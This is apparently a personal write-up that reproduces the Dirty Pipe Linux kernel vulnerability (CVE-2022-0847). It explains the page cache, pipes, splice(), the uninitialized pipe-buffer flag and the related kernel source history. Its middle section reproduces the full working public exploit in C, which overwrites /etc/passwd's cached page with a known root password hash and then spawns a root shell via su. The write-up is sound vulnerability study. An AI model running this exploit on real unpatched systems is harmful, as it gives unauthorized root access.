CVE-2022-0847

Last updated: 1 month ago

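This is my first (admittedly lightweight) CVE reproduction write-up. The focus for now is on understanding the kernel internals; I will add to it as I learn more.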

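Vulnerability information

Vulnerability ID: CVE-2022-0847 (alias: Dirty Pipe)

Disclosure date: March 7, 2022

Severity: High

Affected versions: Linux kernel 5.8 and later, before the fixed releases 5.16.11, 5.15.25, and 5.10.102

Description: A flaw was found in the way the "flags" member of a new pipe buffer structure lacked proper initialization in the copy_page_to_iter_pipe and push_pipe functions in the Linux kernel, so it could contain stale values. An unprivileged local user could use this flaw to write to pages in the page cache backed by read-only files and thereby escalate their privileges on the system.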

Environment setup

Use metarget to switch the kernel

https://blog.nsfocus.net/metarget/

`sudo ./metarget cnv install cve-2022-0847`

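...This is certainly convenient, but because my OS version did not match, I was unable to switch back to the previous kernel afterwards.

Background knowledge

First we need to cover some low-level hardware and kernel concepts.

Memory management

When the CPU needs to run a process, the process's data is brought from secondary storage (such as a hard disk drive) into main memory. This is done because RAM (main memory) is far faster than secondary storage, so data access can keep pace with the CPU. Memory management is a core responsibility of the operating system: it dynamically allocates memory to the processes that need it and frees it again, efficiently, to get the best performance.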

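Page cache

Paging is a key memory management mechanism. The smallest unit of memory the CPU manages is a page, usually 4 KB in size. Main memory is divided into equal-sized blocks called frames. When the CPU is to run a process, the process is likewise divided into equal-sized blocks, also called pages, which are then loaded into main memory.

When data is read for the first time from a storage medium such as a hard disk, Linux also stores it in an otherwise unused area of memory that acts as a cache. This copy in the page cache is kept for some time and can be reused when needed, avoiding expensive disk I/O. If the data is read again later, it can be served quickly from this in-memory cache instead of being read from disk again. If data is written, it is first written to the page cache and only later written to the underlying storage device.

A page that has been modified in the cache but not yet updated in secondary storage (so that the two copies differ) is called a "dirty page". This is part of the reason for the vulnerability's nickname, "Dirty Pipe".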

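Pipes

A pipe provides a one-way communication channel between processes. It has a read end and a write end: data written to the write end can be read from the read end. In essence, a pipe takes the output of one process and holds it so that it can be read as the input of the next process.

Pipe buffers also carry a flag, PIPE_BUF_FLAG_CAN_MERGE, which indicates that the data buffer inside the pipe can be merged: later writes to the pipe may be appended to the page the buffer already points to instead of going to a new page. When that page belongs to the page cache, the appended data changes the cached contents of the file the page came from.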

splice()

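A system call is the programmatic way in which programs and processes request services from the operating system kernel, and splice() is one such system call. More specifically, it moves data between a file descriptor and a pipe without the data having to cross the boundary between user mode and kernel mode.

It is important to understand that splice() does not move the actual data into the pipe; it achieves the transfer by moving a reference to (the address of) that data into the pipe. The pipe then holds a reference to the page cache location where the data lives in memory, rather than the data itself.

Root cause and exploitation

Root cause

Calling splice sends a file to a pipe in "zero-copy" fashion. At the code level, zero-copy means that the file's page cache page is used directly as the pipe's buffer page. This is where an uninitialized-variable bug comes in: the file's cached page is later treated inside the pipe as an ordinary pipe buffer page, gets "appended to", and is thereby tampered with. Yet the kernel does not mark the cached page as dirty in this case, so for a while (until the next reboot or the like) it is not flushed to disk. During that time, every access to the file uses the tampered page cache page, which amounts to a temporary arbitrary write to any readable file and can be used for local privilege escalation.

According to the patch, the flaw is located in the copy_page_to_iter_pipe function, and it is an uninitialized-variable bug. copy_page_to_iter_pipe is reached from within the splice system call.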

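How pipes work, and pipe_write

Since the vulnerability is named Dirty Pipe, it is clearly closely tied to pipes. A pipe is a communication channel provided by the kernel. It is created with the pipe/pipe2 functions, which return two file descriptors, one for sending data and one for receiving it. Inside the kernel, the pipe's buffer space totals 65536 bytes by default and is managed in pages, 16 in all (4096 bytes each). The pages are not contiguous; they are tracked through an array that is used as a ring. Two indices are maintained, one for writing (pipe->head) and one for reading (pipe->tail).

pipe_write source code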

//linux-5.13\fs\pipe.c : 400 : pipe_write
static ssize_t
pipe_write(struct kiocb *iocb, struct iov_iter *from)
{
	struct file *filp = iocb->ki_filp;
	struct pipe_inode_info *pipe = filp->private_data;
	unsigned int head;
	ssize_t ret = 0;
	size_t total_len = iov_iter_count(from);
	ssize_t chars;
	bool was_empty = false;
	bool wake_next_writer = false;

	··· ···
    ··· ···
	head = pipe->head;
	was_empty = pipe_empty(head, pipe->tail);
	chars = total_len & (PAGE_SIZE-1);
	if (chars && !was_empty) { 
        //[1] The pipe is not empty, so try to continue writing in the current last page
		unsigned int mask = pipe->ring_size - 1;
		struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask];
		int offset = buf->offset + buf->len; 

		if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&
		    offset + chars <= PAGE_SIZE) { 
            /*[2] Key point: if the PIPE_BUF_FLAG_CAN_MERGE flag is set, the page may be appended to.
             * If the write does not cross the page boundary, append; otherwise start a new page */
			ret = pipe_buf_confirm(pipe, buf);
			···
			ret = copy_page_from_iter(buf->page, offset, chars, from);
			···
			}
			buf->len += ret;
			···
		}
	}

	for (;;) {//[3] If the previous page cannot be appended to, start a new page
		··· ···
		head = pipe->head;
		if (!pipe_full(head, pipe->tail, pipe->max_usage)) {
			unsigned int mask = pipe->ring_size - 1;
			struct pipe_buffer *buf = &pipe->bufs[head & mask];
			struct page *page = pipe->tmp_page;
			int copied;

			if (!page) {//[4] Allocate a new page
				page = alloc_page(GFP_HIGHUSER | __GFP_ACCOUNT);
				if (unlikely(!page)) {
					ret = ret ? : -ENOMEM;
					break;
				}
				pipe->tmp_page = page;
			}

			spin_lock_irq(&pipe->rd_wait.lock);

			head = pipe->head;
			··· ···
			pipe->head = head + 1;
			spin_unlock_irq(&pipe->rd_wait.lock);

			/* Insert it into the buffer array */
			buf = &pipe->bufs[head & mask];
			buf->page = page;//[5] Put the newly allocated page into the page array
			buf->ops = &anon_pipe_buf_ops;
			buf->offset = 0;
			buf->len = 0;
			if (is_packetized(filp))
				buf->flags = PIPE_BUF_FLAG_PACKET;
			else
				buf->flags = PIPE_BUF_FLAG_CAN_MERGE;
            	//[6] Set the flag; PIPE_BUF_FLAG_CAN_MERGE is the default
			pipe->tmp_page = NULL;

			copied = copy_page_from_iter(page, 0, PAGE_SIZE, from); 
            //[7] Copy the data
			··· ···
			ret += copied;
			buf->offset = 0;
			buf->len = copied;

			··· ···
		}
        ··· ···
    }
	··· ···
	return ret;
}

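If the pipe is not empty (head == tail means an empty pipe), it still holds unread data. In that case pipe_write takes the most recently written page, the one just before head, and looks at its offset and len to find where the data ends. It then tries to append to that page. It checks whether the page carries the PIPE_BUF_FLAG_CAN_MERGE flag; if it does not, appending is not allowed. Appending is also not allowed if the new data, placed after the existing data, would run past the end of the page (that is, if the write would cross a page boundary).

If the previous page cannot be appended to, pipe_write starts a new page: it allocates one with alloc_page, places it in the array slot at head (which may reuse a slot that previously held another page), and initializes its fields. buf->flags is initialized to PIPE_BUF_FLAG_CAN_MERGE by default, because by default a page may be appended to. It then copies in the data being written and repeats these steps until everything has been copied.

The key to the exploit is the PIPE_BUF_FLAG_CAN_MERGE flag that splice leaves uninitialized: it decides whether we can append to a pipe page that is not yet full.

From splice to copy_page_to_iter_pipe

splice's zero-copy approach is to use the file's page cache page directly in place of a pipe buffer page (the pipe buffer's page pointer is changed to point to the file's cached page).

The main job of copy_page_to_iter_pipe, the function containing the flaw, is to point a pipe buffer structure at the page cache page of the file being transferred.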

linux-5.13\lib\iov_iter.c : 417 : copy_page_to_iter_pipe

static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t bytes,
			 struct iov_iter *i)
{
	struct pipe_inode_info *pipe = i->pipe;
	struct pipe_buffer *buf;
	unsigned int p_tail = pipe->tail;
	unsigned int p_mask = pipe->ring_size - 1;
	unsigned int i_head = i->head;
	size_t off;

	··· ···

	off = i->iov_offset;
	buf = &pipe->bufs[i_head & p_mask];//[1] Get the corresponding pipe buffer
	··· ···
	
	buf->ops = &page_cache_pipe_buf_ops;//[2] Update the pipe buffer's metadata to refer to the file's page cache page
	get_page(page);
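	buf->page = page;//[2] The page pointer now points to the file's page cache page
	buf->offset = offset;//[2] offset, len, etc. are set from the current request (determined by the arguments passed to splice)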
	buf->len = bytes;

	pipe->head = i_head + 1;
	i->iov_offset = offset + bytes;
	i->head = i_head;
out:
	i->count -= bytes;
	return bytes;
}

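First, following the ring structure of the pipe's page array, the function finds the slot at the current write position (pipe->head). It points that slot at the prepared page cache page and sets the other fields; len, for example, is determined by the arguments passed to the splice system call. The one thing it does not initialize is flags, and that is the vulnerability.

Going by the pipe_write code analyzed above, if pipe_write is called again to write data into the pipe, the last written buffer (the one just before pipe->head) is the page that splice installed. If its stale flags value contains PIPE_BUF_FLAG_CAN_MERGE, pipe_write concludes that it can keep writing into that page, as long as the write does not cross a page boundary: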

#define PIPE_BUF_FLAG_CAN_MERGE	0x10	/* can merge buffers */

if (chars && !was_empty) { 
        //[1] The pipe is not empty, so try to continue writing in the current last page
		unsigned int mask = pipe->ring_size - 1;
		struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask];
		int offset = buf->offset + buf->len; 

    if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&
                offset + chars <= PAGE_SIZE) { 
                /*[2] Key point: if the PIPE_BUF_FLAG_CAN_MERGE flag is set, the page may be appended to.
                 * If the write does not cross the page boundary, append; otherwise start a new page */
                ret = pipe_buf_confirm(pipe, buf);
                ···
                ret = copy_page_from_iter(buf->page, offset, chars, from);

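The exploit and how it works

Below is the exploit from the vulnerability's discoverer, included so that we can analyze the overall approach of a successful attack.

(The introductory comment at the top is omitted.)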

#define _GNU_SOURCE
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/user.h>

#ifndef PAGE_SIZE
#define PAGE_SIZE 4096
#endif

/**
 * Create a pipe where all "bufs" on the pipe_inode_info ring have the PIPE_BUF_FLAG_CAN_MERGE flag set.
 */
static void prepare_pipe(int p[2])
{
	if (pipe(p)) abort();

	const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);
	static char buffer[4096];

	/* fill the pipe completely; each pipe_buffer will now have the PIPE_BUF_FLAG_CAN_MERGE flag */
	for (unsigned r = pipe_size; r > 0;) {
		unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
		write(p[1], buffer, n);
		r -= n;
	}

	/* drain the pipe, freeing all pipe_buffer instances (but leaving the flags initialized) */
	for (unsigned r = pipe_size; r > 0;) {
		unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
		read(p[0], buffer, n);
		r -= n;
	}

	/* the pipe is now empty, and if somebody adds a new pipe_buffer without initializing its "flags", the buffer will be mergeable */
}

int main() {
	const char *const path = "/etc/passwd";

        printf("Backing up /etc/passwd to /tmp/passwd.bak ...\n");
        FILE *f1 = fopen("/etc/passwd", "r");
        FILE *f2 = fopen("/tmp/passwd.bak", "w");

        if (f1 == NULL) {
            printf("Failed to open /etc/passwd\n");
            exit(EXIT_FAILURE);
        } else if (f2 == NULL) {
            printf("Failed to open /tmp/passwd.bak\n");
            fclose(f1);
            exit(EXIT_FAILURE);
        }

        int c; /* int rather than char, so that EOF can be told apart from data bytes */
        while ((c = fgetc(f1)) != EOF)
            fputc(c, f2);

        fclose(f1);
        fclose(f2);

	loff_t offset = 4; // after the "root"
	const char *const data = ":$1$aaron$pIwpJwMMcozsUxAtRa85w.:0:0:test:/root:/bin/sh\n"; // openssl passwd -1 -salt aaron aaron 
        printf("Setting root password to \"aaron\"...\n");
	const size_t data_size = strlen(data);

	if (offset % PAGE_SIZE == 0) {
		fprintf(stderr, "Sorry, cannot start writing at a page boundary\n");
		return EXIT_FAILURE;
	}

	const loff_t next_page = (offset | (PAGE_SIZE - 1)) + 1;
	const loff_t end_offset = offset + (loff_t)data_size;
	if (end_offset > next_page) {
		fprintf(stderr, "Sorry, cannot write across a page boundary\n");
		return EXIT_FAILURE;
	}

	/* open the input file and validate the specified offset */
	const int fd = open(path, O_RDONLY); // read-only
	if (fd < 0) {
		perror("open failed");
		return EXIT_FAILURE;
	}

	struct stat st;
	if (fstat(fd, &st)) {
		perror("stat failed");
		return EXIT_FAILURE;
	}

	if (offset > st.st_size) {
		fprintf(stderr, "Offset is not inside the file\n");
		return EXIT_FAILURE;
	}

	if (end_offset > st.st_size) {
		fprintf(stderr, "Sorry, cannot enlarge the file\n");
		return EXIT_FAILURE;
	}

	/* create the pipe with all flags initialized with PIPE_BUF_FLAG_CAN_MERGE */
	int p[2];
	prepare_pipe(p);

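	/* splice one byte from before the specified offset into the pipe; this will add a reference to the page cache, but since copy_page_to_iter_pipe() does not initialize the "flags", PIPE_BUF_FLAG_CAN_MERGE is still set */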
	--offset;
	ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0);
	if (nbytes < 0) {
		perror("splice failed");
		return EXIT_FAILURE;
	}
	if (nbytes == 0) {
		fprintf(stderr, "short splice\n");
		return EXIT_FAILURE;
	}

	/* the following write will not create a new pipe_buffer, but will instead write into the page cache, because of the PIPE_BUF_FLAG_CAN_MERGE flag */
	nbytes = write(p[1], data, data_size);
	if (nbytes < 0) {
		perror("write failed");
		return EXIT_FAILURE;
	}
	if ((size_t)nbytes < data_size) {
		fprintf(stderr, "short write\n");
		return EXIT_FAILURE;
	}

	char *argv[] = {"/bin/sh", "-c", "(echo aaron; cat) | su - -c \""
                "echo \\\"Restoring /etc/passwd from /tmp/passwd.bak...\\\";"
                "cp /tmp/passwd.bak /etc/passwd;"
                "echo \\\"Done! Popping shell... (run commands now)\\\";"
                "/bin/sh;"
            "\" root", NULL}; /* the argument vector passed to execv must end with NULL */
        execv("/bin/sh", argv);

        printf("execv() call seems to have failed :(\n");
	return EXIT_FAILURE;
}

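Put simply, the overall approach is: create a pipe, fill it with arbitrary data, drain it again, then use splice() to send 1 byte of the (read-only) target file into the pipe, and finally use write() to write more data into the pipe. That data overwrites the target file's contents in the page cache.

The vulnerability is a by-product of the code's evolution

Reading the source code

To understand the details of how the vulnerability came about, and why it did not exist from the moment splice() was introduced, we need to follow in the kernel source how the can_merge property of pipe buffers evolved into its present form.

Linux 2.6

The splice() system call was introduced.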

Linux 4.9

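Support for pipes was added to iov_iter. The implementations of copy_page_to_iter_pipe() and push_pipe() did not initialize the flags of the pipe buffer, but this was harmless at the time, because the can_merge indicator still lived in ops, that is, in the pipe_buf_operations structure. The assignment buf->ops = &page_cache_pipe_buf_ops gave the buffer a can_merge value of 0, so the vulnerability could not be triggered, but it left a hazard for later code changes.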

Linux 5.1

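Among the many kinds of pipe_buffer, only anon_pipe_buf_ops had can_merge set to 1 (the can_merge field took up an int's worth of space in the structure). It was therefore reasonable to delete the can_merge field from pipe_buf_operations and turn the check made on merge into a pointer comparison. As a result, the assignment to buf->ops in copy_page_to_iter_pipe() no longer doubled as initialization of can_merge. However, the merge check in pipe_write() still behaved correctly, so the vulnerability still could not be triggered.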